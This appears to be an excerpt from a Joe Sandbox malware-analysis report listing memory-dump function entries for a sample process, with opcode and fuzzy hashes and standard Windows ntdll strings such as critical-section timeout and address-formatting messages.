                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                • Instruction ID: 542fa46c1c09bdf752870486bb3e02cb083f04796fe813daf2275f8fc1d2d118
                                                • Opcode Fuzzy Hash: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                • Instruction Fuzzy Hash: 1F90022120944442D60076585408A074005D7D1205F55D025A20645B5DC735CA65A232
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                • Instruction ID: 65921516359d62f8d5d3d0be205e1e26da0dc8636cbae108dd6a7fa2482c6dfb
                                                • Opcode Fuzzy Hash: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                • Instruction Fuzzy Hash: 04900221246441525A45B25844045078006E7E1241795C026A2414970CC626DA6AD722
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                • Instruction ID: 8444e8c5c073f08537f5feee0e5ad5f02bc349f8d6c074850bdbcaa0278670ac
                                                • Opcode Fuzzy Hash: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                • Instruction Fuzzy Hash: 5990023124540402D641725844046074009E7D1241F95C026A1424574EC755CB6AAB62
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                • Instruction ID: 46c990dd8ed61010dd6670d268d27b14a518f24a921ec6edbfbf1a7cb9b8fd13
                                                • Opcode Fuzzy Hash: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                • Instruction Fuzzy Hash: 2490023120540842D60072584404B474005D7E1301F55C02AA1124674DC715CA657622
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                • Instruction ID: 517ad7e89975005f97a2a8a5e667bc5ea15cb1d4b5e75f3dc0b28dd1704168f0
                                                • Opcode Fuzzy Hash: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                • Instruction Fuzzy Hash: 7D90023120540403D600725855087074005D7D1201F55D425A1424578DD756CA656222
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                • Instruction ID: 79336149b241350bb2d54b870bdcfdbd48e0d8f5ee45252b92eba27cbca614a1
                                                • Opcode Fuzzy Hash: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                • Instruction Fuzzy Hash: A690022160940402D640725854187074015D7D1201F55D025A1024574DC759CB6967A2
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                • Instruction ID: fd27892a745314af67f8a0688a96114a181443fe2dba9f9ab1fcdc923572a964
                                                • Opcode Fuzzy Hash: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                • Instruction Fuzzy Hash: D590023120540402D600769854086474005D7E1301F55D025A6024575EC765CAA56232
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                • Instruction ID: 2841014abdc4105725c73c00277c66941673532dd50bf5416d59aef19869d387
                                                • Opcode Fuzzy Hash: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                • Instruction Fuzzy Hash: 7090026121540042D604725844047074045D7E2201F55C026A3154574CC629CE755226
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                • Instruction ID: 6b7912cbe98c6291d18cdd3d23f79d03c31e2cce709b24ae8e4f3bd5564c3674
                                                • Opcode Fuzzy Hash: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                • Instruction Fuzzy Hash: E690026134540442D60072584414B074005D7E2301F55C029E2064574DC719CE666227
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                • Instruction ID: 0fca94e7977060ebeb59763a7dc45cb4d812b3cb0d3e7c2aabcc05a946e0f4f6
                                                • Opcode Fuzzy Hash: bcdc14ce67e206b976cd3a333e1f5d7417efe98f786f219a6fd6ddae0baa91f7
                                                • Instruction Fuzzy Hash: 96900221215C0042D70076684C14B074005D7D1303F55C129A1154574CCA15CA755622
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e02c1efbca3e6233f75ca8c049f03407a70ef4f4983aee4a8da0e3d2c923b8f
                                                • Instruction ID: 7ffa2d21d7ff0ce122559bda0b6cc416f7c2735e1bee329888a0144cf54fb9c7
                                                • Opcode Fuzzy Hash: 8e02c1efbca3e6233f75ca8c049f03407a70ef4f4983aee4a8da0e3d2c923b8f
                                                • Instruction Fuzzy Hash: B1900221605400424640726888449078005FBE2211755C135A1998570DC659CA795766
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 32dbec27de7c3dbffeaa7d79dda39bfbbee8b8c3deee5488dd44b5af661039c0
                                                • Instruction ID: e1f079f35e608d5ad94e785f17228664fbe32c919039a0edbb27b7bfd8048554
                                                • Opcode Fuzzy Hash: 32dbec27de7c3dbffeaa7d79dda39bfbbee8b8c3deee5488dd44b5af661039c0
                                                • Instruction Fuzzy Hash: E090023120580402D600725848087474005D7D1302F55C025A6164575EC765CAA56632
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5592c2a0174579e0f1599abffda2e70a712e168f9b894b6d88469c03b290b3c7
                                                • Instruction ID: d9febb8f12a19f75aa4bdab3256b3f537965d7c5311e4116f97cbde6e9e5cafe
                                                • Opcode Fuzzy Hash: 5592c2a0174579e0f1599abffda2e70a712e168f9b894b6d88469c03b290b3c7
                                                • Instruction Fuzzy Hash: B590023120580402D6007258481470B4005D7D1302F55C025A2164575DC725CA656672
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd87542325a73bc98ef1f935ff83e12a3d47b298c4193f5d401d7956e4729938
                                                • Instruction ID: bd5b6988b98bdd7ebfd36082277141264e73849b87d19ccc65e5120ae462754f
                                                • Opcode Fuzzy Hash: fd87542325a73bc98ef1f935ff83e12a3d47b298c4193f5d401d7956e4729938
                                                • Instruction Fuzzy Hash: 3390022130540402D602725844146074009D7D2345F95C026E2424575DC725CB67A233
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0812d4da02f8f4ba33ba60d39e49b090ff07e19fa305df49f96a73e505cbc0fd
                                                • Instruction ID: d7e9c6c208ee8a8ed4764d7b09ae70e6b349872286f701461f9c6b919a6d5ba1
                                                • Opcode Fuzzy Hash: 0812d4da02f8f4ba33ba60d39e49b090ff07e19fa305df49f96a73e505cbc0fd
                                                • Instruction Fuzzy Hash: 9A90026120580403D640765848046074005D7D1302F55C025A3064575ECB29CE656236
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 150b081a07d109a24e5c8f8146177299e89da804f8da015973acd4e96fc21942
                                                • Instruction ID: 90dc857c85d3e8993448a6292bc9f7599339c03b67bac65335ab26f228d8309d
                                                • Opcode Fuzzy Hash: 150b081a07d109a24e5c8f8146177299e89da804f8da015973acd4e96fc21942
                                                • Instruction Fuzzy Hash: 8590027120540402D640725844047474005D7D1301F55C025A6064574EC759CFE96766
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 849eb866d4fa0f6b2542454bb84b889035db637089e977abc9ef9213f38c9c64
                                                • Instruction ID: a3b9a7e0a587a45723cb00d2949b40eb041668eb757a57189ee29a10781618eb
                                                • Opcode Fuzzy Hash: 849eb866d4fa0f6b2542454bb84b889035db637089e977abc9ef9213f38c9c64
                                                • Instruction Fuzzy Hash: 9D90022160540502D60172584404617400AD7D1241F95C036A2024575ECB25CBA6A232
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a83df7388a7b01116b385189834ee49c11092cd057c833fee29882a0097905d
                                                • Instruction ID: f59250e4770d0e19d23eb0730b09f07f85bd64a9afc2f77cae788fda0174fbc7
                                                • Opcode Fuzzy Hash: 6a83df7388a7b01116b385189834ee49c11092cd057c833fee29882a0097905d
                                                • Instruction Fuzzy Hash: 1F90022120584442D64073584804B0F8105D7E2202F95C02DA5156574CCA15CA695722
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0fe2a4d835767a3129c994f8ec61733e18ec3c9204feb17f48220ce04cb6cfb0
                                                • Instruction ID: 7518df012147020bf278f6f953c188b8591faebdd23702be240d78f4fa555d09
                                                • Opcode Fuzzy Hash: 0fe2a4d835767a3129c994f8ec61733e18ec3c9204feb17f48220ce04cb6cfb0
                                                • Instruction Fuzzy Hash: 0A90022124540802D640725884147074006D7D1601F55C025A1024574DC716CB7967B2
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cb6158106bc7a328ebb850dd0e077bd0cb3388f728947a2c8c4eb962571edb2d
                                                • Instruction ID: a7f7f84ff2c0b91613d8efa65152bd0e5e9b3798271f75486db265ff8d2cc528
                                                • Opcode Fuzzy Hash: cb6158106bc7a328ebb850dd0e077bd0cb3388f728947a2c8c4eb962571edb2d
                                                • Instruction Fuzzy Hash: 7390022124945102D650725C44046178005F7E1201F55C035A18145B4DC655CA696322
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c07d3119af45b96b464199886b454326c4184668c475cbecd94dbf3574492c4
                                                • Instruction ID: 1bbaf283fb038aa6a6756da4a75377ec0c01c547d3630403fd55e450db913ee2
                                                • Opcode Fuzzy Hash: 2c07d3119af45b96b464199886b454326c4184668c475cbecd94dbf3574492c4
                                                • Instruction Fuzzy Hash: 8990023520540402DA10725858046474046D7D1301F55D425A1424578DC754CAB5A222
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51e53a5d949af346e6db96c2546ff1c88b801f8f83c00e0273468ba17733a7c6
                                                • Instruction ID: 26cb14000f2b546b4e05629e6c39602eb1cb4363adbfc7d1b91cffa7072be0d0
                                                • Opcode Fuzzy Hash: 51e53a5d949af346e6db96c2546ff1c88b801f8f83c00e0273468ba17733a7c6
                                                • Instruction Fuzzy Hash: D8900231206401429A4073585804A4F8105D7E2302B95D429A1015574CCA14CA755322
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 282b390c799939476a8114c964645d9b8899f5fb88ab7cbf9e26f997ec0e196a
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                • Instruction ID: 183cafce112d5492bc2b5a0425753c34ccb7e2db340e70736b005c1f0bda4649
                                                • Opcode Fuzzy Hash: b9e2d83e92c4964600022c55fe7a69cd323d787078af57e8aaec0b4d3cc3b799
                                                • Instruction Fuzzy Hash: B051E3B6A04156AECB15DBACC89497EFBFCBB0C240B148269F569E7646D374DE00C7A0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                • Instruction ID: a763c13f3b3fd35034b132962ff3374e776d745f69dc8f709e6041be80a6c6d0
                                                • Opcode Fuzzy Hash: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                • Instruction Fuzzy Hash: DF510575A00645EECFA0DF6CC89087FFBFAEB44304B148469F996C7642DAB4EB448760
                                                Strings
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                • ExecuteOptions, xrefs: 018146A0
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                • Execute=1, xrefs: 01814713
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                • Instruction ID: 7b097f368ebb665cb93e43f7e2a5e02edfaeee40870442d8fb6aaa1af2cbc58e
                                                • Opcode Fuzzy Hash: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                • Instruction Fuzzy Hash: FE51397164021DBAEF15EBA8DC99FA9B7B8EF18318F1404D9D605E7181E7709B41CF50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction ID: 035c33667546b0cb5c0e5d686ce22a2aba84dc7f12d5ed27a303e6440dca5545
                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction Fuzzy Hash: E1023771508742AFE305CF18C494A6BBBE5FFD8704F148A2DF9858B264EB31EA45CB52
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction ID: 5270ccefbae1948bd2d263e772e859e8675d989e5a3d3594791f77230a13a856
                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction Fuzzy Hash: 2A81D070E852498EEF298E6CC8997FEFFF1AF8D320F18415AD951A7691C7309840CB91
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                • Instruction ID: 5f8c094f46e201fff233735c4c5095c2ec6402a8c7d989dc82a29ca6ffb1e091
                                                • Opcode Fuzzy Hash: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                • Instruction Fuzzy Hash: 5421567AA00519ABDB50DE79DC449BFBBEAEF54744F040115ED05D3205EB30EA058B91
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 0181031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                • Instruction ID: e3e343046a924aa3b60de1bb6b10601b9353a372f1a57e35a2a5bc4bbf46d1a4
                                                • Opcode Fuzzy Hash: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                • Instruction Fuzzy Hash: 42E1BE316047419FD726CF28C884B6AFBE5BB88B14F140A6DF5A5CB2E1D774DA84CB42
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                • RTL: Re-Waiting, xrefs: 01817BAC
                                                • RTL: Resource at %p, xrefs: 01817B8E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                • Instruction ID: 0c44c4e4401baebd21901e1e060307798cb64001b3176ca05d04c2b1631c635e
                                                • Opcode Fuzzy Hash: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                • Instruction Fuzzy Hash: F541E3313047069FDB21DE29C840B6AF7F5EF9A720F100A6DFA5AD7280DB31E5458B91
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 018172C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                • RTL: Resource at %p, xrefs: 018172A3
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                • Instruction ID: c56a07a522e8e8623b692b004a18d2d4df4dfdb996fda41b1463ec5fa351dc4b
                                                • Opcode Fuzzy Hash: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                • Instruction Fuzzy Hash: 6941F032600206ABDB21DE29CC41FA6F7B9FB99710F24061DFA56EB240DB20E942C7D1
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                • Instruction ID: fce7c2ad759cbcab1371941371187a9fa2a4f8b2db4846993e0435e5ebae4259
                                                • Opcode Fuzzy Hash: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                • Instruction Fuzzy Hash: D8318772A00119DFDB60DE2DDC44BEEB7F9EB44710F440559ED49D3201EF309A488B60
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction ID: c8b77c1f8d1381a3d17b5fb2968951b1e143b6e20e17d43ae3621f895eeb25da
